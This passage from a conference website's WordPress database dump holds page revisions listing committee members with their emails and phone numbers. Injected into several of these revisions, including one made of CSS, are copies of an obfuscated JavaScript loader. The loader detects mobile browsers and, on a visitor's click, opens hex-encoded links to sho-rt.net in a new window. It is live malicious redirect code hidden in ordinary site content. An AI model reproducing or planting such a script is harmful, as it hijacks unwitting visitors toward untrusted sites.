)|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Executive Local Committee','','inherit','closed','closed','','4849-revision-v1','','','2023-06-27 09:39:49','2023-06-27 09:39:49','',4849,'https://gsw2023.com/?p=4883',0,'revision','',0),
(4884,4,'2023-06-27 09:42:01','2023-06-27 09:42:01','[vc_row][vc_column width=\"1/4\"][vc_column_text css=\".vc_custom_1687856703448{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Chair</strong></span></p>\r\n[/vc_column_text][vc_single_image image=\"4614\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"full-width\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Prof. Dr. Alaa Abdelwahed Abdelbary</strong></em></span>\r\nVice President for Post Graduate and Scientific Research\r\nArab Academy for Science, Technology and Maritime Transport\r\nP.O.Box 1029, Alexandria, Egypt\r\n<table style=\"margin: 0px; padding: 0px;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"width: 20%;\"><strong>E-mail:</strong></td>\r\n<td style=\"width: 26%;\">aaelbary@aast.edu</td>\r\n<td style=\"width: 26%;\">aaelbary@gsw2023.com</td>\r\n<td style=\"width: 26%;\">gsw2023@aast.edu</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 20%;\"><strong>Contacts:</strong></td>\r\n<td style=\"width: 26%;\">Office: +203 5497598</td>\r\n<td style=\"width: 26%;\">Fax: +203 5497598</td>\r\n<td style=\"width: 26%;\">Mobile: +20 100 7382 198</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator][/vc_column][/vc_row][vc_row][vc_column][vc_column_text css=\".vc_custom_1687858431751{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Scientific affairs</strong></span></h3>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_column_text]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/dr-nashwa-1.jpg\" alt=\"\" width=\"113\" height=\"170\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Nashwa El-Bendary</strong></em></span>\r\n<span style=\"font-size: 12pt;\">E-mail : nashwa.elbendary@aast.edu</span>\r\n<span style=\"font-size: 12pt;\">Mobile &amp; WhatsApp: +20 1005201630</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/4\"][/vc_column][vc_column width=\"1/4\"][/vc_column][vc_column width=\"1/4\"][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Executive Local Committee','','inherit','closed','closed','','4849-revision-v1','','','2023-06-27 09:42:01','2023-06-27 09:42:01','',4849,'https://gsw2023.com/?p=4884',0,'revision','',0),
(4886,4,'2023-06-27 09:45:14','2023-06-27 09:45:14','.menu-text:hover{\n	cursor: pointer !important;\n}\n.zero-pad{\n	padding: 0 !important;\n}\n.zero-pad-deep, .zero-pad-deep *{\n	padding: 0 !important;\n}\n\n.zero-mar{\n	margin: 0 !important;\n}\n.zero-mar-deep, .zero-mar-deep *{\n	margin: 0 !important;\n}\n.full-width{\n	width:100% !important;\n}\n.center{\n	text-align: center !important;\n}\n.img_card_1{\n	width: 110px;\n	height: 150px;\n	object-fit: cover;\n}\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return 